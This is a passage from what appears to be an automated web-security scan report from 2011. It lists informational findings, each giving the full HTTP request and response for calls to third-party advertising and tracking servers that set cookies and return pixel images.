!!)<o,-y!#`U2!!!!)<o,-y!#`U3!!!!)<o,-y!#`U9!!!!#<o,-y!#a=#!!!!#<o`%d!#a=6!!!!#<o,-y!#a=7!!!!#<o,-y!#a=9!!!!#<o,-y!#aH+!!!!#<nrb9!#b<m!!!!#<nrVk!#b=J!!!!#<nrVk!#b@$!!!!#<oDg4!#be'!!!!#<nAv>!#bw[!!!!-<o,-y!#c8V!!!!,<o,-y!#c8W!!!!,<o,-y!#c8X!!!!,<o,-y!#dX>!!!!#<o`%d!#e(j!!!!#<o,+N!#e+>!!!!#<oDg4!#ev$!!!!)<o,-y!#fBj!!!!)<o,-y!#fBk!!!!)<o,-y!#fBm!!!!)<o,-y!#fBn!!!!)<o,-y!#fG)!!!!-<o,-y!#fG+!!!!)<o,-y!#g)H!!!!#<o,,D!#g)I!!!!#<o,,D!#g)L!!!!#<o,,D!#g)M!!!!#<o,,D!#g)N!!!!#<o,,D!#g)O!!!!#<o,,D!#g)P!!!!#<o,,D!#g)Q!!!!#<o,,D!#g)R!!!!#<o,,D!#g)S!!!!#<o,,D!#g)T!!!!#<o,,D!#g)U!!!!#<o,,D!#g)V!!!!#<o,,D!#g)W!!!!#<o,,D!#g)X!!!!#<o,,D!#g)Y!!!!#<o,,D!#g)Z!!!!#<o,,D!#g)[!!!!#<o,,D!#g)]!!!!#<o,,D!#g)^!!!!#<o,,D!#g<y!!!!)<o,-y!#g_f!!!!#<o,,D!#gaO!!!!#<o,,D!#gaP!!!!#<o,,D!#gay!!!!$<o,-y!#gb!!!!!$<o,-y!#gb5!!!!#<o,,D!#h.N!!!!#<oDg4!#j9h!!!!#<n9!g!#nEj!!!!#<o,,D!#q+A!!!!#<o,,D!#qF%!!!!#<o,,D!#qF'!!!!#<o,,D!#qUW!!!!#<o,,D!#r=i!!!!#<nZs2!#rVT!!!!#<o,,D!#t:@!!!!$<nZs,!#t<a!!!!$<o,-y!#t<c!!!!)<o,-y!#v9_!!!!#<nB!e!#w!@!!!!#<o,,D!#w!A!!!!#<o,,D!#w!B!!!!#<o,,D!#w!C!!!!#<o,,D!#w!D!!!!#<o,,D!#w!F!!!!#<o,,D!#w!G!!!!#<o,,D!#w!I!!!!#<o,,D"; path=/; expires=Tue, 26-Feb-2013 02:18:27 GMT
Set-Cookie: BX=6l13v316lnh2l&b=4&s=8i&t=47; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Sun, 27 Feb 2011 02:18:27 GMT
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Age: 0
Proxy-Connection: close

GIF89a.............!.......,...........D..;

7.107. http://ad.yieldmanager.com/unpixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /unpixel

Request

GET /unpixel?id=755565&id=913243&id=938620&id=932334&id=946819&id=972492&id=987717&id=1026204&t=2 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://www.project-syndicate.org/register
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=23d97e10-394a-11e0-a408-001b24935f22&_hmacv=1&_salt=3386971552&_keyid=k1&_hmac=386c7ba4901acee5aa0724e9ce3af05518ef0c8b; ih="b!!!!+!'cGC!!!!#<nQH-!'cKt!!!!$<nQH1!,+ZH!!!!#<o,,>!,@lO!!!!#<nQHP!,@rl!!!!%<nQHf!,@s)!!!!#<nQHQ!,A*-!!!!#<nQHt!.`.U!!!!#<o'YF"; pv1="b!!!!#!!L7_!*:n8!$0c3!,+ZH!#WUL!!!!$!?5%!(KYu6!wDW,!%JFh!%Oo9!$8eI~~~~~<o,,><s?nHM.jTN"; bh="b!!!$A!!!?I!!!!$<nAv7!!%#4!!7(q<o_%.!!)Qf!!!!(<nTlX!!*oY!!!!#<o,-y!!-?2!!!!(<o,-y!!-Oo!!!!#<nsgt!!/j$!!!!%<nTlW!!1Mv!!!!'<nZs,!!1N=!!!!$<nZs,!!1SP!!!!#<nsm5!!2-O!!!!(<nTlW!!2P@!!!!#<nAv8!!3):!!!!$<o,,D!!3)?!!!!$<o,,D!!3)C!!!!$<o,,D!!4oZ!!!!#<nA,w!!?VS!!7(q<o_%.!!Mev!!!!#<oa?r!!MfS!!!!'<oaA%!!ObA!!!!*<o,-y!!PL)!!!!$<nZqw!!PL`!!!!%<nZqw!!X+E!!!!$<o,-y!!Z-E!!!!)<o,-y!!Z-F!!!!*<o,-y!!Zwb!!!!-<o,-y!!i0,!!!!*<o,-y!!i0B!!!!%<o,-y!!i:D!!!!$<o,-y!!itb!!!!%<o,,D!!j,.!!<NC<nYX3!!pkJ!!!!%<o,,D!!pkL!!!!%<o,,D!!qrq!!!!%<o,,D!!qrr!!!!%<o,,D!!qrv!!!!%<o,,D!!st`!!!!(<nA,e!!tc8!!!!(<o,-y!!u2f!!!!#<nA,G!!yXN!!!!#<nAwa!#+x/!!!!#<nQdW!#0mN!!!!#<nAwa!#1*R!!!!$<o,-y!#1*S!!!!$<o,-y!#16I!!<NC<nYX3!#17A!!7(q<o_%.!#2C@!!!!$<o,-y!#2Ic!!!!(<oaA$!#2Id!!!!%<oaA!!#3OF!!!!'<o,-y!#3[#!!!!$<nQHk!#6Ty!!!!#<oDg4!#6U!!!!!#<oDg4!#7(x!!!!+<o,-y!#7)a!!!!)<o,-y!#HhR!!!!'<o,-y!#K@'!!!!'<o,-y!#L*a!!!!%<o,,D!#L6M!!!!$<o,-y!#MEy!!!!#<o,+N!#MF%!!!!#<o,+N!#MTC!!!!%<o,,D!#MTF!!!!#<o,,D!#MTH!!!!%<o,,D!#MTI!!!!%<o,,D!#MTJ!!!!%<o,,D!#NnM!!!!$<o,-y!#O29!!!!,<o,-y!#O60!!!!#<nAwa!#O@M!!<NC<nYX3!#OWV!!!!#<okxX!#O^a!!!!#<nAv8!#Os.!!!!)<o,-y!#P%Z!!!!#<oDg4!#P8A!!!!#<nAv8!#PrV!!!!#<nrb9!#R''!!!!#<o,+N!#RU?!!!!%<o,,D!#RUA!!!!%<o,,D!#Sq>!!!!#<nrb9!#T-b!!!!%<o,,D!#TnE!!!!%<o,,D!#Twl!!!!#<nZs,!#Tws!!!!#<nZjk!#UDQ!!!!#<o,,D!#UW*!!!!#<oDg4!#VRb!!!!#<nAv7!#Wa4!!!!#<o,+N!#YQK!!!!#<oDg)!#Z8A!!!!-<o,-y!#Zbn!!!!$<o,-y!#Zc!!!!!$<o,-y!#ZcB!!!!$<o,-y!#ZcU!!!!$<o,-y!#Ze%!!!!$<o,-y!#Ze*!!!!)<o,-y!#Zg?!!!!'<o,-y!#Zgs!!!!)<o,-y!#ZhT!!!!+<o,-y!#](K!!!!#<o,+N!#]Ub!!!!#<o,,D!#]Uc!!!!#<o,,D!#]Ud!!!!#<o,,D!#]Ue!!!!#<o,,D!#]Uf!!!!#<o,,D!#]Ug!!!!#<o,,D!#]Uh!!!!#<o,,D!#]Ui!!!!#<o,,D!#]Uj!!!!#<o,,D!#]Uk!!!!#<o,,D!#]Ul!!!!#<o,,D!#]Um!!!!#<o,,D!#]Un!!!!#<o,,D!#]Uo!!!!#<o,,D!#]Up!!!!#<o,,D!#]Us!!!!#<o,,D!#]Uy!!!!#<o,,D!#]Z!!!!!,<o,-y!#]Z$!!!!(<o,-y!#^$y!!!!#<oDg4!#^c@!!!!#<o,,D!#^cm!!!!#<o,,D!#`-7!!!!,<o,-y!#`T?!!!!)<o,-y!#`U,!!!!)<o,-y!#`U2!!!!)<o,-y!#`U3!!!!)<o,-y!#`U9!!!!#<o,-y!#a=#!!!!#<o`%d!#a=6!!!!#<o,-y!#a=7!!!!#<o,-y!#a=9!!!!#<o,-y!#aH+!!!!#<nrb9!#b<m!!!!#<nrVk!#b=J!!!!#<nrVk!#b@$!!!!#<oDg4!#be'!!!!#<nAv>!#bw[!!!!-<o,-y!#c8V!!!!,<o,-y!#c8W!!!!,<o,-y!#c8X!!!!,<o,-y!#dX>!!!!#<o`%d!#e(j!!!!#<o,+N!#e+>!!!!#<oDg4!#ev$!!!!)<o,-y!#fBj!!!!)<o,-y!#fBk!!!!)<o,-y!#fBm!!!!)<o,-y!#fBn!!!!)<o,-y!#fG)!!!!-<o,-y!#fG+!!!!)<o,-y!#g)H!!!!#<o,,D!#g)I!!!!#<o,,D!#g)L!!!!#<o,,D!#g)M!!!!#<o,,D!#g)N!!!!#<o,,D!#g)O!!!!#<o,,D!#g)P!!!!#<o,,D!#g)Q!!!!#<o,,D!#g)R!!!!#<o,,D!#g)S!!!!#<o,,D!#g)T!!!!#<o,,D!#g)U!!!!#<o,,D!#g)V!!!!#<o,,D!#g)W!!!!#<o,,D!#g)X!!!!#<o,,D!#g)Y!!!!#<o,,D!#g)Z!!!!#<o,,D!#g)[!!!!#<o,,D!#g)]!!!!#<o,,D!#g)^!!!!#<o,,D!#g<y!!!!)<o,-y!#g_f!!!!#<o,,D!#gaO!!!!#<o,,D!#gaP!!!!#<o,,D!#gay!!!!$<o,-y!#gb!!!!!$<o,-y!#gb5!!!!#<o,,D!#h.N!!!!#<oDg4!#j9h!!!!#<n9!g!#nEj!!!!#<o,,D!#q+A!!!!#<o,,D!#qF%!!!!#<o,,D!#qF'!!!!#<o,,D!#qUW!!!!#<o,,D!#r=i!!!!#<nZs2!#rVT!!!!#<o,,D!#t:@!!!!$<nZs,!#t<a!!!!$<o,-y!#t<c!!!!)<o,-y!#v9_!!!!#<nB!e!#w!@!!!!#<o,,D!#w!A!!!!#<o,,D!#w!B!!!!#<o,,D!#w!C!!!!#<o,,D!#w!D!!!!#<o,,D!#w!F!!!!#<o,,D!#w!G!!!!#<o,,D!#w!I!!!!#<o,,D"; BX=6l13v316lnh2l&b=4&s=8i&t=47

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 02:18:27 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: bh="b!!!$A!!!?I!!!!$<nAv7!!%#4!!7(q<o_%.!!)Qf!!!!(<nTlX!!*oY!!!!#<o,-y!!-?2!!!!(<o,-y!!-Oo!!!!#<nsgt!!/j$!!!!%<nTlW!!1Mv!!!!'<nZs,!!1N=!!!!$<nZs,!!1SP!!!!#<nsm5!!2-O!!!!(<nTlW!!2P@!!!!#<nAv8!!3):!!!!$<o,,D!!3)?!!!!$<o,,D!!3)C!!!!$<o,,D!!4oZ!!!!#<nA,w!!?VS!!7(q<o_%.!!Mev!!!!#<oa?r!!MfS!!!!'<oaA%!!ObA!!!!*<o,-y!!PL)!!!!$<nZqw!!PL`!!!!%<nZqw!!X+E!!!!$<o,-y!!Z-E!!!!)<o,-y!!Z-F!!!!*<o,-y!!Zwb!!!!-<o,-y!!i0,!!!!*<o,-y!!i0B!!!!%<o,-y!!i:D!!!!$<o,-y!!itb!!!!%<o,,D!!j,.!!<NC<nYX3!!pkJ!!!!%<o,,D!!pkL!!!!%<o,,D!!qrq!!!!%<o,,D!!qrr!!!!%<o,,D!!qrv!!!!%<o,,D!!st`!!!!(<nA,e!!tc8!!!!(<o,-y!!u2f!!!!#<nA,G!!yXN!!!!#<nAwa!#+x/!!!!#<nQdW!#0mN!!!!#<nAwa!#1*R!!!!$<o,-y!#1*S!!!!$<o,-y!#16I!!<NC<nYX3!#17A!!7(q<o_%.!#2C@!!!!$<o,-y!#2Ic!!!!(<oaA$!#2Id!!!!%<oaA!!#3OF!!!!'<o,-y!#3[#!!!!$<nQHk!#6Ty!!!!#<oDg4!#6U!~~!#7(x!!!!+<o,-y!#7)a!!!!)<o,-y!#HhR!!!!'<o,-y!#K@'!!!!'<o,-y!#L*a!!!!%<o,,D!#L6M!!!!$<o,-y!#MEy!!!!#<o,+N!#MF%~~!#MTC!!!!%<o,,D!#MTF!!!!#<o,,D!#MTH!!!!%<o,,D!#MTI!!!!%<o,,D!#MTJ!!!!%<o,,D!#NnM!!!!$<o,-y!#O29!!!!,<o,-y!#O60!!!!#<nAwa!#O@M!!<NC<nYX3!#OWV!!!!#<okxX!#O^a!!!!#<nAv8!#Os.!!!!)<o,-y!#P%Z~~!#P8A!!!!#<nAv8!#PrV~~!#R''~~!#RU?!!!!%<o,,D!#RUA!!!!%<o,,D!#Sq>!!!!#<nrb9!#T-b!!!!%<o,,D!#TnE!!!!%<o,,D!#Twl!!!!#<nZs,!#Tws!!!!#<nZjk!#UDQ!!!!#<o,,D!#UW*~~!#VRb!!!!#<nAv7!#Wa4~~!#YQK!!!!#<oDg)!#Z8A!!!!-<o,-y!#Zbn!!!!$<o,-y!#Zc!!!!!$<o,-y!#ZcB!!!!$<o,-y!#ZcU!!!!$<o,-y!#Ze%!!!!$<o,-y!#Ze*!!!!)<o,-y!#Zg?!!!!'<o,-y!#Zgs!!!!)<o,-y!#ZhT!!!!+<o,-y!#](K!!!!#<o,+N!#]Ub!!!!#<o,,D!#]Uc!!!!#<o,,D!#]Ud!!!!#<o,,D!#]Ue!!!!#<o,,D!#]Uf!!!!#<o,,D!#]Ug!!!!#<o,,D!#]Uh!!!!#<o,,D!#]Ui!!!!#<o,,D!#]Uj!!!!#<o,,D!#]Uk!!!!#<o,,D!#]Ul!!!!#<o,,D!#]Um!!!!#<o,,D!#]Un!!!!#<o,,D!#]Uo!!!!#<o,,D!#]Up!!!!#<o,,D!#]Us!!!!#<o,,D!#]Uy!!!!#<o,,D!#]Z!!!!!,<o,-y!#]Z$!!!!(<o,-y!#^$y~~!#^c@!!!!#<o,,D!#^cm!!!!#<o,,D!#`-7!!!!,<o,-y!#`T?!!!!)<o,-y!#`U,!!!!)<o,-y!#`U2!!!!)<o,-y!#`U3!!!!)<o,-y!#`U9!!!!#<o,-y!#a=#!!!!#<o`%d!#a=6!!!!#<o,-y!#a=7!!!!#<o,-y!#a=9!!!!#<o,-y!#aH+!!!!#<nrb9!#b<m!!!!#<nrVk!#b=J!!!!#<nrVk!#b@$!!!!#<oDg4!#be'!!!!#<nAv>!#bw[!!!!-<o,-y!#c8V!!!!,<o,-y!#c8W!!!!,<o,-y!#c8X!!!!,<o,-y!#dX>!!!!#<o`%d!#e(j!!!!#<o,+N!#e+>!!!!#<oDg4!#ev$!!!!)<o,-y!#fBj!!!!)<o,-y!#fBk!!!!)<o,-y!#fBm!!!!)<o,-y!#fBn!!!!)<o,-y!#fG)!!!!-<o,-y!#fG+!!!!)<o,-y!#g)H!!!!#<o,,D!#g)I!!!!#<o,,D!#g)L!!!!#<o,,D!#g)M!!!!#<o,,D!#g)N!!!!#<o,,D!#g)O!!!!#<o,,D!#g)P!!!!#<o,,D!#g)Q!!!!#<o,,D!#g)R!!!!#<o,,D!#g)S!!!!#<o,,D!#g)T!!!!#<o,,D!#g)U!!!!#<o,,D!#g)V!!!!#<o,,D!#g)W!!!!#<o,,D!#g)X!!!!#<o,,D!#g)Y!!!!#<o,,D!#g)Z!!!!#<o,,D!#g)[!!!!#<o,,D!#g)]!!!!#<o,,D!#g)^!!!!#<o,,D!#g<y!!!!)<o,-y!#g_f!!!!#<o,,D!#gaO!!!!#<o,,D!#gaP!!!!#<o,,D!#gay!!!!$<o,-y!#gb!!!!!$<o,-y!#gb5!!!!#<o,,D!#h.N!!!!#<oDg4!#j9h!!!!#<n9!g!#nEj!!!!#<o,,D!#q+A!!!!#<o,,D!#qF%!!!!#<o,,D!#qF'!!!!#<o,,D!#qUW!!!!#<o,,D!#r=i!!!!#<nZs2!#rVT!!!!#<o,,D!#t:@!!!!$<nZs,!#t<a!!!!$<o,-y!#t<c!!!!)<o,-y!#v9_!!!!#<nB!e!#w!@!!!!#<o,,D!#w!A!!!!#<o,,D!#w!B!!!!#<o,,D!#w!C!!!!#<o,,D!#w!D!!!!#<o,,D!#w!F!!!!#<o,,D!#w!G!!!!#<o,,D!#w!I!!!!#<o,,D"; path=/; expires=Tue, 26-Feb-2013 02:18:27 GMT
Set-Cookie: BX=6l13v316lnh2l&b=4&s=8i&t=47; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Sun, 27 Feb 2011 02:18:27 GMT
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Age: 0
Proxy-Connection: close

GIF89a.............!.......,...........D..;

7.108. http://adam.companypond.com/peeps.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adam.companypond.com
Path:   /peeps.php

Request

GET /peeps.php?email=4240be8e2dc90b4aef080848af60435f&bio=no HTTP/1.1
Host: adam.companypond.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:51:56 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: symfony=0aab2193f55fe523d049a0486cdcd9d3; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 108

<a style="font-size:small" href="http://www.companypond.com" title="companypond">Powered by CompanyPond</a>

7.109. http://ads.adbrite.com/adserver/behavioral-data/8201  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/behavioral-data/8201

Request

GET /adserver/behavioral-data/8201?d=1276 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://load.exelator.com/load/net.php?n=PGltZyBzcmM9Imh0dHA6Ly9hZHMuYWRicml0ZS5jb20vYWRzZXJ2ZXIvYmVoYXZpb3JhbC1kYXRhLzgyMDE%2FZD0xMjc2IiB3aWR0aD0iMCIgaGVpZ2h0PSIwIiBib3JkZXI9IjAiPjwvaW1nPjxpbWcgc3JjPSJodHRwOi8vaWIuYWRueHMuY29tL3NlZz9hZGQ9ODUwMzQmZXhwaXJlX2RheXM9MjAmb3RoZXI9MTc3MDAxIiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2ltZz48aW1nIHNyYz0iaHR0cDovL3NlZ21lbnQtcGl4ZWwuaW52aXRlbWVkaWEuY29tL3NldF9wYXJ0bmVyX3VpZD9wYXJ0bmVySUQ9NzkmcGFydG5lclVJRD00ZGUzMGE1MDBjOGM2YjhiZjljYmE3NTk5NTA1YjUyOSZzc2NzX2FjdGl2ZT0xIiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2ltZz4%3D&h=c4ae08201e9f109b02be68e4efd9ed36
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=168362171x0.807+1297860041x-1198401335; rb="0:684339:20838240:4d5b2371-3928-7a83-24fb-d52328f5624b:0:712181:20838240::0:742697:20828160:8392341830659049202:0"; ut=1%3AHcxBCoAgFEXRvbyxA62gcDdllhZaGhTld%2B%2Bh08vhJtwNZMKu3%2BeI8wUJZcywBm5OEu7uTCBBnMVOqaWEKTpqqV82Vt35WU3CDx%2B3xYFhGr3X0dYVcv4B; vsd="0@1@4d684712@loadus.exelator.com"

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Sun, 27 Feb 2011 02:18:28 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: Apache-Coyote/1.1
Set-Cookie: ut=1%3ANczRDkAgFIDhdznXXRQN622UKFaIMTneHZnbf9%2F%2BE7YMxAmDPvYxNAsIUMZU3UzNhMxt3MzIkJI%2Fjsh8HYs1xcCVal8lg8Mcy7b%2F3BStflwVqX0dEJC19zrY9IfrugE%3D; Domain=.adbrite.com; Expires=Wed, 24-Feb-2021 02:18:29 GMT; Path=/
Set-Cookie: vsd="0@1@4d69b475@load.exelator.com"; Version=1; Domain=.adbrite.com; Max-Age=172800; Path=/
Set-Cookie: srh=1%3Aq64FAA%3D%3D; Domain=.adbrite.com; Expires=Mon, 28-Feb-2011 02:18:29 GMT; Path=/
Content-Length: 42

GIF89a.............!.......,........@..D.;

7.110. http://ads.adbrite.com/adserver/vdi/712156  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/712156

Request

GET /adserver/vdi/712156?d=6pgp44i37uxw HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh32.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=168362171x0.807+1297860041x-1198401335; ut=1%3ANc1BCoAgEEDRu8zahYZEeBszTam0jIxsuntltH18%2BCekCsQJgz72ELsVBChrm36hdkY2JW4XZEjJjwGZl7mOBSNXyhSQATma7Ri%2FcM5OP95k6t4QCLTSex1dGcB13Q%3D%3D; vsd="0@1@4d6ba1fa@www.acelacomm.com"; rb="0:684339:20838240:4d5b2371-3928-7a83-24fb-d52328f5624b:0:712181:20838240::0:742697:20828160:8392341830659049202:0:806205:20861280:06bdea66-433e-11e0-b98e-00259009a9e4:0"; srh=1%3Aq64FAA%3D%3D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Mon, 28 Feb 2011 17:51:50 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: Apache-Coyote/1.1
Set-Cookie: vsd="0@1@4d6be0b7@s7.addthis.com"; Version=1; Domain=.adbrite.com; Max-Age=172800; Path=/
Set-Cookie: rb="0:684339:20838240:4d5b2371-3928-7a83-24fb-d52328f5624b:0:712156:20861280:6pgp44i37uxw:0:712181:20838240::0:742697:20828160:8392341830659049202:0:806205:20861280:06bdea66-433e-11e0-b98e-00259009a9e4:0"; Version=1; Domain=.adbrite.com; Max-Age=7776000; Path=/
Content-Length: 42

GIF89a.............!.......,........@..D.;

7.111. http://ads.undertone.com/afr.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.undertone.com
Path:   /afr.php

Request

GET /afr.php?01AD=3ZKQmO-b8_GXmcNnITFGIgIBnuIoKCHLCxpOLas1ONy8Fx9ZI8hTANQ&01RI=49546D5762419DE&01NA=&zoneid=4837&cb=825081833 HTTP/1.1
Host: ads.undertone.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UTID=043d176571d94464bd0a69b85f214a65; UTPROFILES=15026%23670%3A6%7C672%3A1%7C675%3A1%7C1193%3A1%7C1847%3A6%2C3; A28X=CT-1

Response

HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 27 Feb 2011 16:44:49 GMT
Connection: close
Set-Cookie: A28X=3ZKQmO-b8_GXmcNnITFGIgIBnuIoKCHLCxpOLas1ONy8Fx9ZI8hTANQ; expires=Sun, 27-Mar-2011 16:44:48 GMT; path=/; domain=.undertone.com
Set-Cookie: UTID=043d176571d94464bd0a69b85f214a65; expires=Mon, 27-Feb-2012 16:44:48 GMT; path=/
Set-Cookie: UTPROFILES=15032%2322%3A1%7C23%3A1%7C670%3A12%7C672%3A7%7C675%3A7%7C1193%3A7%7C1847%3A12%2C3; expires=Sat, 28-May-2011 16:44:48 GMT; path=/
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"
Content-Length: 5507

<html><head><title>Advertisement</title></head><body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0" style="background-color:transparent;width:100%;text-align:center;"><a href="http://ad
...[SNIP]...

7.112. http://ads.undertone.com/l  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.undertone.com
Path:   /l

Request

GET /l?bannerid=175955&campaignid=28380&zoneid=4837&UTLIA=1&cb=58adfc3e2f844c288ff1889ba17cbbd0&bk=lhabuo&id=czph05d26f6v4q4tptee7ddhm HTTP/1.1
Host: ads.undertone.com
Proxy-Connection: keep-alive
Referer: http://ads.undertone.com/afr.php?01AD=3ZKQmO-b8_GXmcNnITFGIgIBnuIoKCHLCxpOLas1ONy8Fx9ZI8hTANQ&01RI=49546D5762419DE&01NA=&zoneid=4837&cb=825081833
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A28X=3ZKQmO-b8_GXmcNnITFGIgIBnuIoKCHLCxpOLas1ONy8Fx9ZI8hTANQ; UTID=043d176571d94464bd0a69b85f214a65; UTPROFILES=15032%2322%3A1%7C23%3A1%7C670%3A12%7C672%3A7%7C675%3A7%7C1193%3A7%7C1847%3A12%2C3; __qca=P0-1442460135-1298825088911

Response

HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSDo OUR BUS UNI COM NAV"
Content-Length: 43
Content-Type: image/gif
Date: Sun, 27 Feb 2011 16:44:50 GMT
Connection: close
Set-Cookie: _UTLIA[175955]=lhabuq-4837; expires=Tue, 29-Mar-2011 16:44:50 GMT; path=/
Set-Cookie: UTID=043d176571d94464bd0a69b85f214a65; expires=Mon, 27-Feb-2012 16:44:50 GMT; path=/

GIF89a.............!.......,...........D..;

7.113. http://ak1.abmr.net/is/ads.undertone.com  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ak1.abmr.net
Path:   /is/ads.undertone.com

Request

GET /is/ads.undertone.com?U=/afr.php&V=3-VzIn8ZYSiFFjy0VX4ZUTKeCNriTjoWix1rri23bZq5pgfv9koMT90GsaPVU7EZ%2f6&I=49546D5762419DE&D=undertone.com&01AD=1&zoneid=4837&cb=825081833 HTTP/1.1
Host: ak1.abmr.net
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 01AI=2-2-9C94B40D14CF116211C89A321F34F56107A0B23B011846565C0F6B28510F2947-8D6C2445AAF86F4280B20D0557301909D1193DD71448D7D1ABDA09C754A92B78

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://ads.undertone.com/afr.php?01AD=3gQj3QoVNcwfBxvZTOU9YbA8ox7hUQ8Ot0R_BsXnxL6UmeDNV8L0HGg&01RI=49546D5762419DE&01NA=&zoneid=4837&cb=825081833
Expires: Sun, 27 Feb 2011 16:44:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 27 Feb 2011 16:44:47 GMT
Connection: close
Set-Cookie: 01AI=2-2-B2FE5E22323F3824099F676801AED25FC7E0A543BC24A2576652F91AADDDA229-504C1EA044F39259CDD286E32FEDE376339A413553A19FC47FE911C3E0AE9189; expires=Mon, 27-Feb-2012 16:44:47 GMT; path=/; domain=.abmr.net
P3P: policyref="http://www.abmr.net/w3c/policy.xml", CP="NON DSP COR CURa ADMa DEVa OUR SAMa IND"


7.114. http://api.postup.com/TCTUL001/twidget/1.jsonp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.postup.com
Path:   /TCTUL001/twidget/1.jsonp

Request

